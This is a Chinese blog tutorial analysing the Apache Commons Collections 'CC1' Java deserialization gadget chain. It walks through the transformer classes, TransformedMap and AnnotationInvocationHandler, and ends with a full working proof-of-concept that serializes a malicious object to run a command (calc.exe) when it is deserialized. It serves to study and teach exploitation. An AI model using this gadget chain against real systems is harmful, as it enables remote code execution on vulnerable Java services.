java-CC链1分析

最新推荐文章于 2024-05-22 10:02:15 发布
最新推荐文章于 2024-05-22 10:02:15 发布
阅读量441 收藏 3
点赞数 1
分类专栏: java安全 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62613905/article/details/128800911
版权

java中本地命令执行常常用到反射+Runtime类

        Class rtClass = Class.forName("java.lang.Runtime");
        Object rt = rtClass.getMethod("getRuntime").invoke(rtClass);
        rtClass.getMethod("exec",String.class).invoke(rt,"calc.exe");

之前分析了简单的URLDNS链,这里分析Apache Commons Collections链 也就是CC链

那么我们先看看漏洞起因:

public interface Transformer {
 public Object transform(Object input);
}

首先以下的部分类实现了Transformer,serializable接口,实现了transform方法,我们看看关键的类

1.InvokerTransformer类反射执行命令

implements Transformer, Serializable

 public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
        this.iMethodName = methodName;
        this.iParamTypes = paramTypes;
        this.iArgs = args;
    } 
public Object transform(Object input) {
      
         Class cls = input.getClass();
         Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
         return method.invoke(input, this.iArgs);
   }

首先第一个构造函数,(方法名,形参列表,给参数一传入的实参列表)

transform方法利用反射让对象去执行方法,那么我们岂不是可以让Runtime对象去执行exec

package com.zzy.ApacheCC;

import org.apache.commons.collections.functors.InvokerTransformer;

public class TransTest1 {
    public static void main(String[] args) {
        InvokerTransformer exec = new InvokerTransformer(
                "exec",
                new Class[]{String.class},
                new Object[]{"calc.exe"}
                );

        Object input = Runtime.getRuntime();
        exec.transform(input);

    }
}

到这里我们仅仅实现了本地命令执行,怎么让目标自动触发transform?怎么把恶意参数传入?

2.ConstantTransformer类返回一个对象

implements Transformer, Serializable

public ConstantTransformer(Object constantToReturn) {
        this.iConstant = constantToReturn;
    }

    public Object transform(Object input) {
        return this.iConstant;
    }

该类的构造方法接收一个对象,并存储在成员变量中,transform方法返回这个对象,看似 没什么作用,但是它可以作为回调,返回一个对象。也就是如果在别的地方调用了这个对象的transform方法就可以得到这个对象存储在成员变量中的对象

3.ChainedTransformer遍历数组,依次调用数组元素的transform方法

implements Transformer, Serializable

    public ChainedTransformer(Transformer[] transformers) {
        this.iTransformers = transformers;
    }

    public Object transform(Object object) {
        for(int i = 0; i < this.iTransformers.length; ++i) {
            object = this.iTransformers[i].transform(object);
        }

        return object;
    }

这个类竟然接受一个Transform接口数组,利用多态特性我们可以把实现类传入

我们传入数组后再调用它的transform方法

transform方法中遍历整个数组并依次调用数组中每个对象的transform方法,并将返回值作为下一个transform方法的形参

到这里我们解决了InvokerTransformer.transform()的调用问题,我们先完善poc,实现前三个类的联动效果

package com.zzy.ApacheCC;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;

public class TransTest2 {
    public static void main(String[] args) {
        Transformer[] transformers = {
                //该对象的transform方法会返回输入的对象-->则返回Runtime类对象
                new ConstantTransformer(Runtime.class),

                //该对象的Transform方法返回一个对象-->通过Runtime类对象的.getClass()方法获得Class类对象
                // Class类对象调用getMethod方法获得getMethod方法对象(这样就可以让Runtime类对象来调用)
                //getMethod对象调用invoke方法获取到getRuntime方法对象
                // 总体如下
                //Class cls = Runtime.class.getClass(); //class java.lang.Class
                //Method method = cls.getMethod("getMethod", new Class[]{String.class, Class[].class});
                //Object invoke = method.invoke(Runtime.class, new Object[]{"getRuntime", new Class[0]});
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}
                ),

                //getRuntime方法对象通过getClass方法得到Method类对象
                //Method类对象通过getMethod方法获得invoke方法对象
                //invoke方法对象调用invoke(getRuntime对象,new Object[]{null, null})
                //即getRuntime对象.invoke(null,null)-->null.getRuntime()
                //getRuntime方法对象执行invoke方法获取Runtime对象(null 可以理解为:Runtime r = null)
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}
                ),

                //Runtime对象通过getClass方法获取Runtime类对象
                //Runtime类对象通过getMethod方法获得exec方法对象
                //exec方法对象调用invoke方法
                //Runtime对象通过invoke方法调用exec方法
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{"calc.exe"}
                )
        };
        //该类可以传入Transfomer对象数组,以上的类都实现了Transformer接口,重写了Transform方法
        //该类遍历对象数组,依次调用Transform方法,并将每一次调用的返回对象作为下一个元素调用的形参
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        chainedTransformer.transform(null);
    }
}

虽然解决了第一个问题,但是新的问题来了,怎么调用ChainedTransformers.transform方法而且还需要传入一个数组

4.TransformedMap

extends AbstractInputCheckedMapDecorator implements Serializable

    public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
        return new TransformedMap(map, keyTransformer, valueTransformer);
    }

    protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {
        super(map);
        this.keyTransformer = keyTransformer;
        this.valueTransformer = valueTransformer;
    }
    
    protected Object checkSetValue(Object value) {
        return this.valueTransformer.transform(value);
    }

TransformedMap的decorate方法返回一个实例对象

我们发现TransformedMap的checkSetValue方法调用了第三个参数的transform方法

我们就可以这样传参数TransformedMap.decorate(map,null,ChainedTransformers对象)

但是这个chekSetValue方法修饰符为protected,最大范围为不同包的子类,无法直接调用

那么我们需要再找一个可以调用checkSetValue方法的类

5.AbstractInputCheckedMapDecorator

我们先看看TransformedMap的父类AbstractInputCheckedMapDecorator

public Set entrySet() {
        return (Set)(this.isSetValueChecking() ? new AbstractInputCheckedMapDecorator.EntrySet(super.map.entrySet(), this) : super.map.entrySet());
    }

static class EntrySetIterator extends AbstractIteratorDecorator {
        private final AbstractInputCheckedMapDecorator parent;

        protected EntrySetIterator(Iterator iterator, AbstractInputCheckedMapDecorator parent) {
            super(iterator);
            this.parent = parent;
        }

        public Object next() {
            Entry entry = (Entry)super.iterator.next();
            return new AbstractInputCheckedMapDecorator.MapEntry(entry, this.parent);
        }
    }

static class MapEntry extends AbstractMapEntryDecorator {
        private final AbstractInputCheckedMapDecorator parent;

        protected MapEntry(Entry entry, AbstractInputCheckedMapDecorator parent) {
            super(entry);
            this.parent = parent;
        }

        public Object setValue(Object value) {
            value = this.parent.checkSetValue(value);
            return super.entry.setValue(value);
        }
    }

我们发现setValue方法调用了checkSetValue方法,那么怎么调用setValue方法?

6.AnnotationInvocationHandler

implements InvocationHandler, Serializable

	AnnotationInvocationHandler(Class<? extends Annotation> var1, Map<String, Object> var2) {
        Class[] var3 = var1.getInterfaces();
        if (var1.isAnnotation() && var3.length == 1 && var3[0] == Annotation.class) {
            this.type = var1;
            this.memberValues = var2;
        } else {
            throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type.");
        }
    }
    
private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
        var1.defaultReadObject();
        AnnotationType var2 = null;

        try {
            var2 = AnnotationType.getInstance(this.type);
        } catch (IllegalArgumentException var9) {
            throw new InvalidObjectException("Non-annotation type in annotation serial stream");
        }

        Map var3 = var2.memberTypes();
        Iterator var4 = this.memberValues.entrySet().iterator();

        while(var4.hasNext()) {
            Entry var5 = (Entry)var4.next();
            String var6 = (String)var5.getKey();
            Class var7 = (Class)var3.get(var6);
            if (var7 != null) {
                Object var8 = var5.getValue();
                if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
                    var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
                }
            }
        }

    }

这个类中readObject方法中调用checkSetValue方法,readObject不就是反序列化的关键方法吗

这里具体分析var5.setValue是怎么执行的.

memberValues就是我们传入的TransformedMap对象

memberValues.entrySet().iterator  ---->hasNext() ---->next() ---->setValue

我们看看这个next方法返回什么

static class EntrySetIterator extends AbstractIteratorDecorator {
        private final AbstractInputCheckedMapDecorator parent;

        protected EntrySetIterator(Iterator iterator, AbstractInputCheckedMapDecorator parent) {
            super(iterator);
            this.parent = parent;
        }

        public Object next() {
            Entry entry = (Entry)super.iterator.next();
            return new AbstractInputCheckedMapDecorator.MapEntry(entry, this.parent);
        }
    }

返回一个MapEntry,那最后不就是调用了MapEntry.setValue(),setValue调用checkSetValue

static class MapEntry extends AbstractMapEntryDecorator {
        private final AbstractInputCheckedMapDecorator parent;

        protected MapEntry(Entry entry, AbstractInputCheckedMapDecorator parent) {
            super(entry);
            this.parent = parent;
        }

        public Object setValue(Object value) {
            value = this.parent.checkSetValue(value);
            return super.entry.setValue(value);
        }
    }

这里的parent就是我们的TransformedMap对象

再看一眼checkSetValue方法,ChainedTransformer.transform被调用,完成命令执行

protected Object checkSetValue(Object value) {
        return this.valueTransformer.transform(value);
    }

好到这里cc链已经完整,附上POC和流程图

package com.zzy.ApacheCC;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;

public class Poc {
    public static void main(String[] args) throws Exception{
        Transformer[] transformers = {
                new ConstantTransformer(Runtime.class),

                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}
                ),

                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}
                ),

                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{"calc.exe"}
                )
        };
        ChainedTransformer ct = new ChainedTransformer(transformers);

        Map innerMap = new HashMap();
        innerMap.put("value","");
        Map outerMap = TransformedMap.decorate(innerMap,null,ct);


        //以下对两种调用方式给以比较说明:
        //Class.newInstance() 只能够调用无参的构造函数,即默认的构造函数;
        //Constructor.newInstance() 可以根据传入的参数,调用任意构造构造函数。
        Class<?> cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor cst = cl.getDeclaredConstructor(Class.class, Map.class);
        cst.setAccessible(true);
        Object exploit = cst.newInstance(Target.class, outerMap);

        //序列化
        ObjectOutputStream outStream = new ObjectOutputStream(new FileOutputStream("D:/exp.xxx"));
        outStream.writeObject(exploit);
        outStream.close();

        //反序列化
        ObjectInputStream inputS = new ObjectInputStream(new FileInputStream("D:/exp.xxx"));
        Object result = inputS.readObject();
        inputS.close();
        System.out.println(result);

    }
}

 

本文仅供参考学习交流

Innocent..
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sub-funix-cc2
03-07
这可能是一个跨平台的解决方案,或者是利用Java的工具来处理Unix系统编程的问题。 【压缩包子文件的文件名称列表】"sub-funix-cc2-main" 指示了主要的源代码文件或执行文件。在Unix环境中,"main"通常表示程序的...
JAVA-SSM农产品自主供销小程序+论文.zip
04-12
(1)管理员功能需求 管理员登陆后,主要模块包括首页、个人中心、用户管理、农户管理、产品分类管理、农产品管理、咨询信息管理、咨询回复管理、系统管理等功能。 (3)农户功能需求 农户登陆后进入小程序可以对...
Java安全研究——反序列化漏洞之CC
weixin_43889136的博客
04-13 4054
0x01前言 apachecommons-collections组件下的反序列化漏洞,自从该组件被爆出漏洞后,许多安全研究员相继挖掘到java多种组件的漏洞,危害严重。本人也是初学Java审计不久,技术薄弱,所以在此做一个cc的学习总结,如有错误还请大佬指出。 若本文有侵权行为,请立即私信,将全面修正。 0x02漏洞环境 JDK1.8 Apache Commons Collections 3.2版本 0x03反序列化漏洞 序列化是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,.
Java反序列化之CC解析
defeed的博客
05-11 1252
一篇学习介绍javacc的文章,对cc的transform和简单的利用做了一些介绍
Commons-Collections篇-CC1小白基础分析学习
最新发布
鸣蜩十四的博客
05-22 1091
Apache Commons工具包中有⼀个组件叫做 Apache Commons Collections ,其封装了Java 的 Collection(集合) 相关类对象,它提供了很多强有⼒的数据结构类型并且实现了各种集合工具类,Commons Collections被⼴泛应⽤于各种Java应⽤的开发,而正是因为在大量web应⽤程序中这些类的实现以及⽅法的调用,导致了反序列化漏洞的普遍性和严重性
java反序列之CC的目的
Go_change的博客
05-08 324
cc
一文带你搞懂CC1(小白入门必看文章)
maple_leaf
12-03 2094
CC是利用Java反序列化漏洞进行攻击的一种方式。CC利用Apache Commons Collections库中的Transformer接口的实现类,通过巧妙的设计,将恶意代码序列化为一个对象,然后将该对象传递给一个反序列化函数,从而触发恶意代码的执行。
CC入门
why811的博客
08-21 322
我们已经知道了序列化和反序列化漏洞的基本原理,那么怎么通过构造恶意数据,让反序列化产生非预期对象呢?当中有一个组件叫做,主要封装了Java的相关类对象,它提供了很多强有力的数据结构类型并且实现了各种集合工具类。collection是set,list,queue的抽象。作为Apache开源项目的重要组件,Commons Collections被广泛应用于各种Java应用的开发,而正是因为在大量web应用程序中这些类的实现以及方法的调用,导致了反序列化用漏洞的普遍性和严重性。
HIT-Study:CC ++ Java
05-18
【标题】"HIT-Study: CC++ Java" 指的是一个学习资源集合,重点关注C++和Java这两种编程语言。HIT-Study可能是某个学习项目或者课程的名称,其中涵盖了C++和Java的核心概念、编程技巧以及相关实践。这个压缩包可能是...
java面试题目与技巧1
11-25
│ │ │ Java程序员认证模拟题及详细分析.doc │ │ │ question.rar │ │ │ test4.doc │ │ │ 模拟题.rar │ │ │ 经典的104-147模拟题.rar │ │ │ │ │ ├─035 │ │ │ 2003.10.5.15.51.43.TestKing%...
SWT开发的浏览器(Java)--源代码
05-14
通过分析这个源代码,我们可以深入理解SWT如何被用来构建具有实际应用价值的程序。 首先,我们要了解SWT的优势。与Java标准库中的AWT和Swing不同,SWT直接调用操作系统的API,因此在性能和外观上更接近原生应用。这...
Java安全入门(二)——CC1 分析+详解
热门推荐
weixin_45808483的博客
01-29 1万+
背景 在2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客里,借用Java反序列化和Apache Commons Collections这一基础类库实现远程命令执行的真实案例来到人们的视野,各大Java Web Server纷纷躺枪,这个漏洞横扫WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版。 从Apache CommonsCollections 说起。 Apache C...
Java反序列化:CC1 详解
Jay17的博客
10-06 1026
Java反序列化:CC1 详解
Java反序列化CC链分析
阿道夫的博客
02-06 570
Apache Commons是Apache软件基金会的项目,曾经隶属于Jakarta项目。Commons的目的是提供可重用的、解决各种实际的通用问题且开源的Java代码。Commons由三部分组成:Proper(是一些已发布的项目)、Sandbox(是一些正在开发的项目)和Dormant(是一些刚启动或者已经停止维护的项目)。Commons Collections包为Java标准的CollectionsAPI提供了相当好的补充。在此基础上对其常用的数据结构操作进行了很好的封装、抽象和补充。
java反序列化cc
wanan的博客
01-24 363
java反序列化cc
【心得】javaCC1入门CC个人笔记
uuzeray的博客
01-23 1575
来劲了,感觉离真正的CTF又近了一步。本文仅从一个萌新的角度去谈,如有纰漏,纯属蒟蒻。
cc2(小宇特详解)
小宇的web博客
02-19 3807
cc2(小宇特详解) 漏洞环境 jdk8u71 apache commons collection-4.0 与cc1的区别 cc2利用中使用了动态字节码编程来构造poc cc2没有使用反序列化漏洞 cc利用流程 构造一个TestTemplatesImpl恶意类转成字节码,然后通过反射将恶意类的字节码注入到TemplatesImpl对象的_bytecodes属性(构造利用核心代码) 创建一个InvokerTransformer并传递一个newTransformer方法,然后将Invoker
cc1分析
Sk1y的博客
04-08 723
cc1分析 文章目录cc1分析jdk版本依赖测试弹计算器用反射去调用Runtime,去弹一个计算器倒序找危险函数InvokerTransformer-->transformerTransformedMapMapEntry入口AnnotationInvocationHandlerRuntime序列化ChainedTransformer类对其简化继续调试 jdk版本 jdk版本:jdk8u65 因为在jdk8u71的时候,已经修复了 下载相应的jdk版本,去下面这个接 https://www.or
java反序列化 cc1 分析
m0_64815693的博客
04-17 1300
java反序列化 cc1 分析

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值